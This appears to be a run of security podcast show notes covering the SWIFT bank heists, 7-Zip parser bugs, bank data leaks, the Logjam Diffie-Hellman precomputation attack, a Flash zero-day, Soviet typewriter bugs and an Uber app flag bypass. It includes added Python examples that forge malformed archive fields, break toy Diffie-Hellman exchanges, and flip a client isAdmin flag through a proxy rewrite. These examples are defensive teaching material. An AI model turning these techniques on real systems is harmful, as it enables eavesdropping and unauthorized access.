  • “The SWIFT room is roughly 12 feet by 8 feet, a window-less office located on the eighth floor of the bank’s annex building in Dhaka. There are four servers and four monitors in the room”
  • “The SWIFT facility should have been walled off from the rest of the network. That could have been done if the bank had used the more expensive, ‘managed’ switches, which allow engineers to create separate networks, said Alam, whose institute includes a cyber-crime division.”
  • My kingdom for a VLAN… (a VLAN on a managed switch is only the start: the SWIFT segment still needs a filtering device between it and everything else, and the switch’s own management plane has to be locked down, or the segmentation can simply be reconfigured away)
  • Last week, a second bank was hit
  • Additional Coverage
  • “The second case targeted a commercial bank, Swift spokeswoman Natasha de Teran said, without naming it. It was not immediately clear how much money, if any, was stolen in the second attack.”
  • Swift said in a statement that the attackers exhibited a “deep and sophisticated knowledge of specific operational controls” at targeted banks and may have been aided by “malicious insiders or cyber attacks, or a combination of both”.
  • “News of a second case comes as law enforcement authorities in Bangladesh and elsewhere investigate the February cyber theft from the Bangladesh central bank account at the New York Federal Reserve Bank. Swift has acknowledged that that scheme involved altering Swift software to hide evidence of fraudulent transfers, but that its core messaging system was not harmed.”
  • “In the second case SWIFT said attackers had also used a kind of malware called a “Trojan PDF reader” to manipulate PDF reports confirming the messages in order to hide their tracks.”
  • That sounds a lot more sophisticated than the first attack. Of course, it could just be that sophisticated attackers hit an unsophisticated bank and did not need such techniques there, or that they did use them and simply went undetected because of the lax security at the first bank
  • SWIFT network issues security advisory about malware targeting banks
  • “In both instances, the attackers have exploited vulnerabilities in banks funds’ transfer initiation environments, prior to messages being sent over SWIFT. The attackers have been able to bypass whatever primary risk controls the victims have in place, thereby being able to initiate the irrevocable funds transfer process. In a second step, they have found ways to tamper with the statements and confirmations that banks would sometimes use as secondary controls, thereby delaying the victims’ ability to recognise the fraud.”

Cisco Talos finds vulnerabilities in 7-Zip

  • “Recently Cisco Talos has discovered multiple exploitable vulnerabilities in 7-Zip. These type of vulnerabilities are especially concerning since vendors may not be aware they are using the affected libraries. This can be of particular concern, for example, when it comes to security devices or antivirus products. 7-Zip is supported on all major platforms, and is one of the most popular archive utilities in-use today. Users may be surprised to discover just how many products and appliances are affected.”
  • For example, a number of virus and malware scanners use the 7-Zip library to look inside the various archive formats
  • This means an attacker could send you a file that your virus scanner would automatically open, triggering the exploit without you ever opening the file yourself
  • The Talos article includes a link to a Google search for the 7-Zip license, which you can find embedded in a huge number of open and closed source applications
  • “An out-of-bounds read vulnerability exists in the way 7-Zip handles Universal Disk Format (UDF) files. The UDF file system was meant to replace the ISO-9660 file format, and was eventually adopted as the official file system for DVD-Video and DVD-Audio.”
  • “Central to 7-Zip’s processing of UDF files is the CInArchive::ReadFileItem method. Because volumes can have more than one partition map, their objects are kept in an object vector. To start looking for an item, this method tries to reference the proper object using the partition map’s object vector and the “PartitionRef” field from the Long Allocation Descriptor. Lack of checking whether the “PartitionRef” field is bigger than the available amount of partition map objects causes a read out-of-bounds and can lead, in some circumstances, to arbitrary code execution.”
  • “An exploitable heap overflow vulnerability exists in the Archive::NHfs::CHandler::ExtractZlibFile method functionality of 7-Zip. In the HFS+ file system, files can be stored in compressed form using zlib. There are three different ways of keeping data in that form depending on the size of the data. Data from files whose compressed size is bigger than 3800 bytes is stored in a resource fork, split into blocks.”
  • “Block size information and their offsets are kept in a table just after the resource fork header. Prior to decompression, the ExtractZlibFile method reads the block size and its offset from the file. After that, it reads block data into static size buffer “buf”. There is no check whether the size of the block is bigger than size of the buffer “buf”, which can result in a malformed block size which exceeds the mentioned “buf” size. This will cause a buffer overflow and subsequent heap corruption.”
  • “Sadly, many security vulnerabilities arise from applications which fail to properly validate their input data. Both of these 7-Zip vulnerabilities resulted from flawed input validation. Because data can come from a potentially untrusted source, data input validation is of critical importance to all applications’ security. Talos has worked with 7-Zip to responsibly disclose, and then patch these vulnerabilities. Users are urged to update their vulnerable versions of 7-Zip to the latest revision, version 16.00, as soon as possible.”
  • 2016-03-03 – Vendor Notification
  • 2016-05-10 – Public Disclosure
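The two Talos findings are the same mistake twice: an index (PartitionRef) and a length (the HFS+ block size) taken from the file and used without comparing them to the structure they index into. The following is an added example, not 7-Zip’s code, showing both checks in Python against a small container format constructed for the purpose; the layout, the field widths, the 64 KiB buffer size and the function names are all assumptions made for the illustration.

```python
"""Bounds checks for untrusted index and length fields.

Added example modelled on the two 7-Zip bugs above; not 7-Zip's code. The
container layout below is constructed for the example and is far simpler
than UDF or HFS+.
"""
import struct

DECOMP_BUF_SIZE = 64 * 1024   # fixed-size output buffer, standing in for 7-Zip's "buf"


class MalformedArchive(ValueError):
    """Raised instead of reading or writing outside the structures we own."""


def resolve_partition(partition_maps, partition_ref):
    """PartitionRef (from the Long Allocation Descriptor) selects a partition map.

    The UDF bug: the field was used as a vector index without comparing it to
    the vector length, so a crafted value reads past the end of the vector.
    """
    if not 0 <= partition_ref < len(partition_maps):
        raise MalformedArchive(
            f"PartitionRef {partition_ref} outside {len(partition_maps)} partition maps")
    return partition_maps[partition_ref]


def read_block_table(fork, buf_size=DECOMP_BUF_SIZE):
    """Parse a constructed resource fork: u32 count, then (u32 offset, u32 size)
    per block, then the block data. Returns the block payloads.

    The HFS+ bug: the size field was trusted when copying a block into the
    fixed buffer. Here every size is checked against the buffer, and every
    (offset, size) range against the fork, before any data is touched.
    """
    if len(fork) < 4:
        raise MalformedArchive("truncated header")
    (count,) = struct.unpack_from("<I", fork, 0)
    table_end = 4 + 8 * count          # in C this multiply must itself be overflow-checked
    if table_end > len(fork):
        raise MalformedArchive(f"block table ({count} entries) overruns the fork")
    blocks = []
    for i in range(count):
        offset, size = struct.unpack_from("<II", fork, 4 + 8 * i)
        if size > buf_size:
            raise MalformedArchive(f"block {i}: size {size} exceeds buffer {buf_size}")
        # Compare with a subtraction, not offset + size, so the test cannot wrap in C.
        if offset > len(fork) or size > len(fork) - offset:
            raise MalformedArchive(f"block {i}: range {offset}+{size} outside the fork")
        blocks.append(bytes(fork[offset:offset + size]))
    return blocks


def build_fork(blocks):
    """Constructed helper: serialise payloads into the layout read_block_table parses."""
    table = bytearray(struct.pack("<I", len(blocks)))
    data = bytearray()
    offset = 4 + 8 * len(blocks)
    for payload in blocks:
        table += struct.pack("<II", offset, len(payload))
        data += payload
        offset += len(payload)
    return bytes(table + data)


def forge_block_size(fork, claimed_size):
    """Constructed attacker input: same fork, but block 0 claims a different size."""
    return fork[:8] + struct.pack("<I", claimed_size) + fork[12:]


def forge_block_count(fork, claimed_count):
    """Constructed attacker input: same fork, but the header claims more entries."""
    return struct.pack("<I", claimed_count) + fork[4:]


def is_rejected(fork):
    """True if the parser refuses the fork rather than reading out of bounds."""
    try:
        read_block_table(fork)
    except MalformedArchive:
        return True
    return False


if __name__ == "__main__":
    fork = build_fork([b"alpha", b"beta"])
    print(read_block_table(fork))
    print(is_rejected(forge_block_size(fork, DECOMP_BUF_SIZE + 1)))   # the heap-overflow shape
    print(is_rejected(forge_block_size(fork, 100)))                   # fits the buffer, not the fork
```

The order of the checks matters: the count is validated before the loop ever runs, and each entry’s size is compared with the buffer and with the remaining fork bytes before the slice is taken, which is exactly the comparison ExtractZlibFile was missing.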

Two large Middle Eastern banks hit by hackers

  • “A massive collection of documents from Qatar National Bank, based in Doha, was leaked and posted online to the whistleblower site Cryptome on April 26. The leaked data, which totals 1.4 GBs, apparently includes internal corporate files and sensitive financial data for QNB’s customers.”
  • “Cryptome reports that the leak comprises 15,460 files, containing details, including passwords, PINs and payment card data, for hundreds of thousands of the bank customers’ accounts. Multiple experts have also examined the data, and likewise report that it appears to be legitimate. But Cryptome offered no insights into how the data was obtained, for example, if it was via an external hack attack, or an inside job.”
  • “Multiple sources who have reviewed the data dump have also confirmed to ISMG that the data appears to be genuine. One researcher, speaking on condition of anonymity, also confirmed that he had successfully used leaked customer internet banking credentials from the data dump to begin logging in to the customer’s account, purely for research purposes. But he said the bank’s systems then sent a one-time password to the customer’s registered mobile number, which would serve as a defense against any criminals who might now attempt to use the leaked data to commit fraud.”
  • Additional Coverage: IBTimes
  • “Although analysis of the leaked data remains ongoing, there are reports that it contains additional, unusual information. U.K.-based digital media news site IBTimes, for example, reports that in addition to consumer data, the leaked information also includes documents with information on Qatar’s Al-Thani royal family as well as the broadcaster Al Jazeera, which is partly funded by the same family.”
  • “In addition, some leaked folders are marked “Spy” and contain what appear to be intelligence dossiers on individuals, according to IBTimes. Some files contained in the dump are labeled as “MI6” – in apparent reference to the British intelligence agency – with others naming Qatar’s state security bureau, known as the Mukhabarat, as well as French and Polish intelligence agencies, IBTimes reports.”
  • “Interestingly, there is also additional data about mainly foreign bank account holders, which includes information such as their Facebook and LinkedIn profiles, along with ‘friends’ associated through those social networks. This data doesn’t appear to have come directly from the bank itself, rather the perpetrator used the data held by the bank to then build up profiles of further targets.”
  • A second breach occurred at InvestBank, in the UAE
  • Additional Coverage
  • “A massive tranche of nearly 10GB of files alleged to be from Sharjah, UAE-based InvestBank appears to have been dumped online by the hacking group “Bozkurtlar” – Turkish for “Gray Wolves” – on May 7. The zip archive released by the attackers appears to contain internal files and sensitive financial documents, including InvestBank customers’ data.”
  • “The Bozkurtlar hacker or hacking group appears to have Turkish ties, and also claimed credit for a similar data dump on April 26, involving Doha-based Qatar National Bank. In that case, leaked customer data for QNB was quickly posted online by the Cryptome.org whistleblower site”
  • “The dumped data appears to include a massive amount of information tied to InvestBank’s systems, including SQL databases and some backup folders. Speaking on condition of anonymity, one expert who’s reviewed the data says it appears to date from 2011 to September 2015.”
  • “Customer data included in the leak includes copies of ID documents, photographs of individuals, documents relating to land purchases – such as stamp papers and financials, as well as bank statements and nearly 100,000 credit card numbers, including expiry dates in clear text. Security researchers, however, note that customer credentials such as account passwords and PINs appear to be encrypted.”
  • “The dump also contains comprehensive details on InvestBank’s IT setup, including clear-text credentials for its production systems, switches, routers, virtual machines and Windows servers – many of which appear to have been using easily guessable vendor default passwords. Screenshots of server settings and diagrams of server and data center layouts have also been found in the dump, in addition to details of VPN setups with the bank’s branch offices.”
  • “The dump also appears to contain complete details of InvestBank’s Oracle FLEXCUBE core banking solution implementation, including costs, deliverables, scope of work, licensing information and the entire database pertaining to InvestBank’s FLEXCUBE implementation.”
  • “In December 2015, a hacker broke into InvestBank’s systems and released records for thousands of customers, after the bank refused to pay the $3 million bitcoin ransom demanded by the attacker”
  • InvestBank claims this is not a new hack, but just the old data being fully released
  • It is possible the original attacker gave up on trying to ransom or sell the data, and just released it publicly

The post My Kingdom for a VLAN | TechSNAP 267 first appeared on Jupiter Broadcasting.

National Security Breaking Agency | TechSNAP 236 https://original.jupiterbroadcasting.net/89226/national-security-breaking-agency-techsnap-236/ Thu, 15 Oct 2015 18:03:54 +0000 https://original.jupiterbroadcasting.net/?p=89226 How the NSA might be breaking Crypto, fresh zero day exploit against Flash with a twist & Keylogging before computers. Plus a great batch of your questions, a rocking round-up & much more! Thanks to: Get Paid to Write for DigitalOcean Direct Download: HD Video | Mobile Video | MP3 Audio | OGG Audio | […]

The post National Security Breaking Agency | TechSNAP 236 first appeared on Jupiter Broadcasting.


— Show Notes: —

How might the NSA be breaking crypto?

  • “There have been rumors for years that the NSA can decrypt a significant fraction of encrypted Internet traffic. In 2012, James Bamford published an article quoting anonymous former NSA officials stating that the agency had achieved a “computing breakthrough” that gave them “the ability to crack current public encryption.” The Snowden documents also hint at some extraordinary capabilities: they show that NSA has built extensive infrastructure to intercept and decrypt VPN traffic and suggest that the agency can decrypt at least some HTTPS and SSH connections on demand. However, the documents do not explain how these breakthroughs work, and speculation about possible backdoors or broken algorithms has been rampant in the technical community.”
  • “Yesterday at ACM CCS, one of the leading security research venues, we and twelve coauthors presented a paper that we think solves this technical mystery.”
  • PDF: Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice
  • “The key is, somewhat ironically, Diffie-Hellman key exchange, an algorithm that we and many others have advocated as a defense against mass surveillance. Diffie-Hellman is a cornerstone of modern cryptography used for VPNs, HTTPS websites, email, and many other protocols. Our paper shows that, through a confluence of number theory and bad implementation choices, many real-world users of Diffie-Hellman are likely vulnerable to state-level attackers.”
  • “If a client and server are speaking Diffie-Hellman, they first need to agree on a large prime number with a particular form. There seemed to be no reason why everyone couldn’t just use the same prime, and, in fact, many applications tend to use standardized or hard-coded primes. But there was a very important detail that got lost in translation between the mathematicians and the practitioners: an adversary can perform a single enormous computation to “crack” a particular prime, then easily break any individual connection that uses that prime.”
  • “For the most common strength of Diffie-Hellman (1024 bits), it would cost a few hundred million dollars to build a machine, based on special purpose hardware, that would be able to crack one Diffie-Hellman prime every year.”
  • “Would this be worth it for an intelligence agency? Since a handful of primes are so widely reused, the payoff, in terms of connections they could decrypt, would be enormous. Breaking a single, common 1024-bit prime would allow NSA to passively decrypt connections to two-thirds of VPNs and a quarter of all SSH servers globally. Breaking a second 1024-bit prime would allow passive eavesdropping on connections to nearly 20% of the top million HTTPS websites. In other words, a one-time investment in massive computation would make it possible to eavesdrop on trillions of encrypted connections.”
  • “Based on the evidence we have, we can’t prove for certain that NSA is doing this. However, our proposed Diffie-Hellman break fits the known technical details about their large-scale decryption capabilities better than any competing explanation. For instance, the Snowden documents show that NSA’s VPN decryption infrastructure involves intercepting encrypted connections and passing certain data to supercomputers, which return the key. The design of the system goes to great lengths to collect particular data that would be necessary for an attack on Diffie-Hellman but not for alternative explanations, like a break in AES or other symmetric crypto. While the documents make it clear that NSA uses other attack techniques, like software and hardware “implants,” to break crypto on specific targets, these don’t explain the ability to passively eavesdrop on VPN traffic at a large scale.”
  • “8.4% of Alexa Top 1M HTTPS domains allow DHE_EXPORT, of which 92.3% use one of the two most popular primes”
  • “After a week-long precomputation for each of the two top export-grade primes (see Table 1), we can quickly break any key exchange that uses them. Here we show times for computing 3,500 individual logs; the median is 70 seconds.”
  • “Our calculations suggest that it is plausibly within NSA’s resources to have performed number field sieve precomputations for at least a small number of 1024-bit Diffie-Hellman groups. This would allow them to break any key exchanges made with those groups in close to real time. If true, this would answer one of the major cryptographic questions raised by the Edward Snowden leaks: How is NSA defeating the encryption for widely used VPN protocols?”
  • If the NSA has precomputed just one 1024-bit DH group, it could compromise 37% of HTTPS connections to the top 1 million sites using an active downgrade attack; with the ten most popular 1024-bit groups precomputed, that rises to 56%
  • For VPNs, the single most popular 1024-bit group covers 66% of all traffic; for SSH, 25%. For both VPN and SSH, precomputing the top ten groups adds nothing to the likelihood of compromise, which suggests that outside of one very popular 1024-bit group, most servers do not share a group with others
  • “we performed a scan in which we mimicked the algorithms offered by OpenSSH 6.6.1p1, the latest version of OpenSSH. In this scan, 21.8% of servers preferred the 1024-bit Oakley Group 2, and 37.4% preferred a server-defined group. 10% of the server-defined groups were 1024-bit, but, of those, near all provided Oakley Group 2 rather than a custom group”
  • Recommendations from the paper:
    • Transition to elliptic curves: Transitioning to elliptic curve Diffie-Hellman (ECDH) key exchange with appropriate parameters avoids all known feasible cryptanalytic attacks
    • Increase minimum key strengths: Server operators should disable DHE_EXPORT and configure DHE ciphersuites to use primes of 2048 bits or larger.
    • Avoid fixed-prime 1024-bit groups: For implementations that must continue to use or support 1024-bit groups for compatibility reasons, generating fresh groups may help mitigate some of the damage caused by NFS-style precomputation for very common fixed groups.
    • Don’t deliberately weaken crypto: Our downgrade attack on export-grade 512-bit Diffie-Hellman groups in TLS illustrates the fragility of cryptographic “front doors”. Although the key sizes originally used in DHE_EXPORT were intended to be tractable only to NSA, two decades of algorithmic and computational improvements have significantly lowered the bar to attacks on such key sizes.
  • “Prior to our work, Internet Explorer, Chrome, Firefox, and Opera all accepted 512-bit primes, whereas Safari allowed groups as small as 16 bits. As a result of our disclosures, Internet Explorer, Firefox, and Chrome are transitioning the minimum size of the DHE groups they accept to 1024 bits, and OpenSSL and Safari are expected to follow suit.”
  • Additional information from the researchers site WeakDH.org
  • Sysadmin’s guide to securing your servers
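The whole argument rests on the cost being split into two phases: a huge computation that depends only on the group (p, g), and a cheap per-connection step afterwards. The following added example illustrates that shape in Python; it is not the paper’s code. The number field sieve is swapped for baby-step/giant-step, which is a different algorithm with the same precompute-then-lookup structure, and the 20-bit prime, the generator and the names are constructed so it runs in milliseconds; the real attack needs a 1024-bit p and the special-purpose hardware the paper costs out.

```python
"""One precomputation per group, then cheap per-connection breaks.

Added illustration of the Logjam argument above; not the paper's code. The
number field sieve is replaced by baby-step/giant-step, which has the same
two-phase shape: a table that depends only on (p, g), then a fast lookup per
key exchange. The toy prime below is constructed for the example.
"""
import math
import random


class GroupPrecomputation:
    """The expensive, one-time phase for a fixed Diffie-Hellman group (p, g)."""

    def __init__(self, p, g):
        if p < 3 or any(p % q == 0 for q in range(2, math.isqrt(p) + 1)):
            raise ValueError("p must be prime")
        self.p, self.g = p, g
        self.m = math.isqrt(p - 1) + 1          # ceil(sqrt(group order))
        # Baby steps: g^j -> j for 0 <= j < m. This table is the "crack the prime"
        # cost and is shared by every connection that uses this group.
        self.table = {}
        value = 1
        for j in range(self.m):
            self.table.setdefault(value, j)
            value = value * g % p
        # Giant-step multiplier g^(-m) mod p, via Fermat since p is prime.
        self.giant = pow(g, p - 1 - self.m, p)

    def discrete_log(self, y):
        """The cheap, per-connection phase: find x with g^x = y (mod p)."""
        gamma = y % self.p
        for i in range(self.m):
            j = self.table.get(gamma)
            if j is not None:
                return i * self.m + j
            gamma = gamma * self.giant % self.p
        raise ValueError("y is not a power of g")


def dh_exchange(p, g, rng):
    """Honest parties. A passive observer sees p, g, A and B only."""
    a = rng.randrange(1, p - 1)
    b = rng.randrange(1, p - 1)
    A, B = pow(g, a, p), pow(g, b, p)
    return A, B, pow(B, a, p)              # the shared secret both sides derive


def eavesdrop(pre, A, B):
    """Recover the shared secret from public values alone, using the table."""
    return pow(B, pre.discrete_log(A), pre.p)


def break_many(pre, n, seed=1):
    """Break n independent exchanges in the same group; returns how many succeeded."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(n):
        A, B, secret = dh_exchange(pre.p, pre.g, rng)
        hits += eavesdrop(pre, A, B) == secret
    return hits


P, G = 1000003, 2      # constructed toy group; 1000003 is prime

if __name__ == "__main__":
    pre = GroupPrecomputation(P, G)        # paid once per group
    print(break_many(pre, 1000))           # every later exchange in that group falls cheaply
```

Two things carry over to the real setting. The table is built from (p, g) alone, so a server that generates its own group (the paper’s third recommendation) forces the attacker to pay the first phase again, while every server that ships the same hard-coded prime shares the attacker’s cost. And the per-connection phase needs only the public values, which is why the attack is passive once the precomputation exists.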


Fresh Zero Day exploit against fully patched Adobe Flash

  • Just last week, we were commenting on how quiet things have been on the Adobe Flash front
  • Sorry for jinxing it for everyone
  • This zero day exploit even affects Flash version 19.0.0.207 which was released on Tuesday
  • Adobe expects to release a patch that fixes the Zero day some time next week
  • “Attackers are exploiting a previously unknown vulnerability in fully patched versions of Adobe’s Flash Player so they can surreptitiously install malware on end users’ computers”
  • “So far, the attacks are known to target only government agencies as part of a long-running espionage campaign carried out by a group known as Pawn Storm, researchers from antivirus provider Trend Micro said in a blog post published Tuesday. It’s not unusual for such zero-day exploits to be more widely distributed once the initial element of surprise wanes. The critical security flaw is known to reside in Flash versions 19.0.0.185 and 19.0.0.207 and may also affect earlier versions. At this early stage, no other technical details are available”
  • “In this most recent campaign of Pawn Storm, several Ministries of Foreign Affairs received spear phishing e-mails. These contain links to sites that supposedly contain information about current events, but in reality, these URLs hosted the exploit”
  • In this wave of attacks, the emails were about the following topics:
    • “Suicide car bomb targets NATO troop convoy Kabul”
    • “Syrian troops make gains as Putin defends air strikes”
    • “Israel launches airstrikes on targets in Gaza”
    • “Russia warns of response to reported US nuke buildup in Turkey, Europe”
    • “US military reports 75 US-trained rebels return Syria”
  • The most startling thing here is that you would not expect government employees to get such news via email; they should know better than to trust emails with these subjects or follow links to such headlines.
  • “It’s worth noting that the URLs hosting the new Flash zero-day exploit are similar to the URLs seen in attacks that targeted North Atlantic Treaty Organization (NATO) members and the White House in April this year.”
  • It will be interesting to see if any of the exploit kits manage to pick up this Zero-day before the patch is released
  • This attack is currently focused on the government, and the attackers likely want to keep their zero-day to themselves
  • Once a fix is released, I would expect the regular malware authors to reverse engineer the fix to find the exploit, and see this added to the regular exploit kits
  • Additional Coverage: Krebs

Keylogging before computers: How Soviets used IBM Selectric keyloggers to spy on US diplomats

  • “A National Security Agency memo that recently resurfaced a few years after it was first published contains a detailed analysis of what very possibly was the world’s first keylogger—a 1970s bug that Soviet spies implanted in US diplomats’ IBM Selectric typewriters to monitor classified letters and memos.”
  • “The electromechanical implants were nothing short of an engineering marvel. The highly miniaturized series of circuits were stuffed into a metal bar that ran the length of the typewriter, making them invisible to the naked eye. The implant, which could only be seen using X-ray equipment, recorded the precise location of the little ball Selectric typewriters used to imprint a character on paper. With the exception of spaces, tabs, hyphens, and backspaces, the tiny devices had the ability to record every key press and transmit it back to Soviet spies in real time.”
  • “The Soviet implants were discovered through the painstaking analysis of more than 10 tons’ worth of equipment seized from US embassies and consulates and shipped back to the US. The implants were ultimately found inside 16 typewriters used from 1976 to 1984 at the US embassy in Moscow and the US consulate in Leningrad. The bugs went undetected for the entire eight-year span and only came to light following a tip from a US ally whose own embassy was the target of a similar eavesdropping operation.”
  • “‘Despite the ambiguities in knowing what characters were typed, the typewriter attack against the US was a lucrative source of information for the Soviets,’ an NSA document, which was declassified several years ago, concluded. ‘It was difficult to quantify the damage to the US from this exploitation because it went on for such a long time.’ The NSA document was published here in 2012. Ars is reporting the document because it doesn’t appear to have been widely covered before and generated a lively conversation Monday on the blog of encryption and security expert Bruce Schneier.”
  • “When the implant was first reported, one bugging expert cited in Discover magazine speculated that it worked by measuring minute differences in the time it took each character to be imprinted. That theory was based on the observation that the time the Selectric ball took to complete a rotation was different for each one. A low-tech listening device planted in the room would then transmit the sounds of a typing Selectric to a Soviet-operated computer that would reconstruct the series of key presses.”
  • “In fact, the implant was far more advanced and worked by measuring the movements of the “bail,” which was the term analysts gave to the mechanical arms that controlled the pitch and rotation of the ball.”
  • “In reality, the movement of the bails determined which character had been typed because each character had a unique binary movement corresponding to the bails. The magnetic energy picked up by the sensors in the bar was converted into a digital electrical signal. The signals were compressed into a four-bit frequency select word. The bug was able to store up to eight four-bit characters. When the buffer was full, a transmitter in the bar sent the information out to Soviet sensors.”
  • “There was some ambiguity in determining which characters had been typed. NSA analysts using the laws of probability were able to figure out how the Soviets probably recovered text. Other factors which made it difficult to recover text included the following: The implant could not detect characters that were typed without the ball moving. If the typist pressed space, tab, shift, or backspace, these characters were invisible to the implant. Since the ball did not move or tilt when the typist pressed hyphen because it was located at the ball’s home position, the bug could not read this character either.”
  • “The implants were also remarkable for the number of upgrades they received. Far from being a static device that was built once and then left to do its job, the bugs were constantly refined.”
  • “There were five varieties or generations of bugs. Three types of units operated using DC power and contained either eight, nine, or ten batteries. The other two types operated from AC power and had beacons to indicate whether the typewriter was turned on or off. Some of the units also had a modified on and off switch with a transformer, while others had a special coaxial screw with a spring and lug. The modified switch sent power to the implant. Since the battery-powered machines had their own internal source of power, the modified switch was not necessary. The special coaxial screw with a spring and lug connected the implant to the typewriter linkage, and this linkage was used as an antenna to transmit the information as it was being typed. Later battery-powered implants had a test point underneath an end screw. By removing the screw and inserting a probe, an individual could easily read battery voltage to see if the batteries were still active.”
  • “The devices could be turned off to avoid detection when the Soviets knew inspection teams were in close proximity. Newer devices operated by the US may have had the ability to detect the implants, but even then an element of luck would have been required, since the infected typewriter would have to be turned on, the bug would have to be turned on, and the analyzer would have to be tuned to the right frequency. To lower this risk, Soviet spies deliberately designed the devices to use the same frequency band as local television stations.”
  • I thought this was an interesting example of how espionage works and how hard it can be to detect

An Uber Mess | TechSNAP 205 https://original.jupiterbroadcasting.net/78707/an-uber-mess-techsnap-205/ Thu, 12 Mar 2015 08:59:29 +0000 https://original.jupiterbroadcasting.net/?p=78707 Using encryption is a good thing, but its just the start, we’ll explain. Plus how one developer totally owned the Uber app. Then it’s a great batch of your questions & our answers! Thanks to: Get Paid to Write for DigitalOcean Direct Download: HD Video | Mobile Video | MP3 Audio | OGG Audio | […]

The post An Uber Mess | TechSNAP 205 first appeared on Jupiter Broadcasting.


— Show Notes: —

OPSEC (Operational Security) for Activists and Journalists

  • Using encryption is a good thing, but if you need to hide from advanced adversaries, such as the foreign governments you are protecting yourself against or reporting on, you need more than encryption to make sure you don’t get “disappeared”
  • The FBI has identified people even when they were using tor
  • “The only protection against communication systems is to avoid their use.” —Cryptome [32], Communications Privacy Folly, June 13, 2012
  • Anti-forensics [33] is all about reducing both the quantity and quality of information that adversaries acquire. In other words, if spies succeed in breaching your computer then give them as little useful information as possible. One way to achieve this is through compartmentalization, a technique honed to a fine edge by intelligence outfits like the KGB.
  • Especially sensitive government messages are still passed by courier; even governments don’t trust crypto 100%
  • “Avoid patterns (geographic, chronological, etc.). Arbitrarily relocate to new spots during the course of a phone call. Stay in motion. Phone calls should be as short as possible so that the amount of data collected by surveillance equipment [44] during the call’s duration is minimized. This will make it more difficult for spies to make accurate predictions.”
  • “Carrying additional mobile devices (e.g. surface tablet, second cell phone) creates the risk that the peripheral hardware may undermine anonymity through correlation. Finally, pay for items using cash when operational. Credit card transactions are like a big red flag”
  • “If spies somehow capture a secure cell phone and are able to siphon data off of it, one potential countermeasure is to flood the device with false information. Skillful application of this technique can lead spies on a goose chase. When Edward Snowden was fleeing Hong Kong he intentionally bought a plane ticket to India with his own credit card in an effort to throw pursuers off his track.”
  • “In summary, expect security tools to fail, compartmentalize to contain damage and apply the Grugq’s core tenets of anti-forensics. Don’t put blind faith in technology. Focus your resources on maintaining rigorous procedures. When things get dicey it’ll be your training and preparation that keep you secure.”

How I accessed employee settings on the Uber app

  • While debugging an upcoming app, Nathan Mock, an iOS engineer, “accidentally” got a closer look at the internals of Uber’s iOS app.
  • He used Charles, a proxy that lets you monitor and analyze traffic between a client and the internet. Once the device trusts the proxy’s own CA certificate, Charles can terminate TLS and present a certificate it signed itself for each host, so HTTPS requests and responses show up in plain text. With the requests flowing in, he noticed one being made every 5 seconds.
  • That particular request is used by Uber to receive and communicate rider location, driver availability, application configuration settings and more to devices.
  • Upon inspecting the response, he discovered the key isAdmin, which was set to false for his particular account. Charles allows you to define rewrite rules, so he rewrote the response, changing the value of isAdmin to true, curious to see what effect it would have on the app. He browsed through the app with the new value applied and, lo and behold, stumbled upon the Employee Settings screen, reachable from the About screen
  • Uber’s app is extremely dynamic. Their client’s architecture allows them to customize the app’s UI to certain geographical areas, riders, and even individual devices, allowing them to do things such as deliver kittens, deliver food, offer rides on helicopters, and of course, change prices…all without re-submitting the binary for approval to the app store. This is common practice for many client-server applications, a neat way to target certain features/functionality to a limited subset of users without the burden/time constraints of submitting an app for review.
  • If a malicious developer wanted to get a forbidden feature or functionality past the review team, it is possible to hide the feature behind a “switch”, turning it off during the review process only to enable it after approved, all server side. If their purpose is to control the feature set of apps that get into the store, it can be bypassed through this type of client-server configuration architecture. Apple certainly has the power to take an app down once they make the discovery but before they make that discovery, it is out in the wild.
  • As you can see, your traffic is not 100% safe and anyone can inspect your requests and responses (even with HTTPS), so it’s a good idea to always utilize defensive programming. A malicious third party could use this flaw to exploit the app in ways unforeseen. Even though Uber utilized HTTPS, there are still inherent flaws with the protocol that allows one to access certain screens meant for employees only.
  • Uber recently suffered a data breach that leaked information about 50,000 drivers
  • The breach apparently occurred on May 13 2014, was not discovered until September 17 2014, and was not announced until February 27 2015.
  • “Uber says it will offer a free one-year membership of Experian’s ProtectMyID Alert”
  • It turns out Uber may have accidentally stored sensitive database keys on a public GitHub page, and is suing GitHub to get the IP addresses of those who accessed the information
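The point about isAdmin being a UI hint rather than an authorization decision is easier to see in code. The following is an added example, not Uber’s code: a tiny in-memory “API” with a constructed role table and two made-up session tokens, where the config response carries an isAdmin hint exactly so that a proxy rewrite rule can flip it. The hardened endpoint ignores whatever the client echoes back; the vulnerable variant shows the anti-pattern.

```python
"""Client-side flag vs. server-side authorization.

Added example, not Uber's code. A tiny in-memory "API" with a role table
stands in for the backend; the constructed config response carries an
isAdmin hint exactly so that a proxy rewrite rule can flip it.
"""
import json

# Server-side source of truth for roles (constructed data).
ROLES = {
    "rider-1001": {"rider"},
    "emp-2002": {"rider", "employee"},
}

# Bearer tokens the server issued at login (constructed).
SESSIONS = {"tok-rider": "rider-1001", "tok-emp": "emp-2002"}


def _caller(token):
    """Resolve a bearer token to a user id, or None if unknown."""
    return SESSIONS.get(token)


def get_config(token):
    """GET /config: the periodic client-configuration response.

    isAdmin is a hint for the client's UI, nothing more.
    """
    user = _caller(token)
    if user is None:
        return 401, {}
    return 200, {"isAdmin": "employee" in ROLES[user], "pollSeconds": 5}


def employee_settings(token, client_config):
    """GET /employee/settings, hardened: the role comes from ROLES, never
    from anything the client sends back (client_config is ignored)."""
    user = _caller(token)
    if user is None:
        return 401, {}
    if "employee" not in ROLES.get(user, set()):
        return 403, {"error": "forbidden"}
    return 200, {"featureFlags": {"helicopter": True}}


def vulnerable_employee_settings(token, client_config):
    """The anti-pattern: trust the isAdmin value the client echoes back."""
    if _caller(token) is None:
        return 401, {}
    if not client_config.get("isAdmin"):
        return 403, {"error": "forbidden"}
    return 200, {"featureFlags": {"helicopter": True}}


def proxy_rewrite(body, key, value):
    """Stand-in for a Charles rewrite rule applied to a JSON response body."""
    rewritten = json.loads(json.dumps(body))
    rewritten[key] = value
    return rewritten


def client_shows_employee_screen(config):
    """Client-side gating decides what to draw; it grants nothing."""
    return bool(config.get("isAdmin"))


def demo():
    """Rider account, tampered config: the screen appears, the hardened API refuses."""
    _, cfg = get_config("tok-rider")
    tampered = proxy_rewrite(cfg, "isAdmin", True)
    return {
        "screen_visible": client_shows_employee_screen(tampered),
        "hardened": employee_settings("tok-rider", tampered)[0],
        "vulnerable": vulnerable_employee_settings("tok-rider", tampered)[0],
        "real_employee": employee_settings("tok-emp", cfg)[0],
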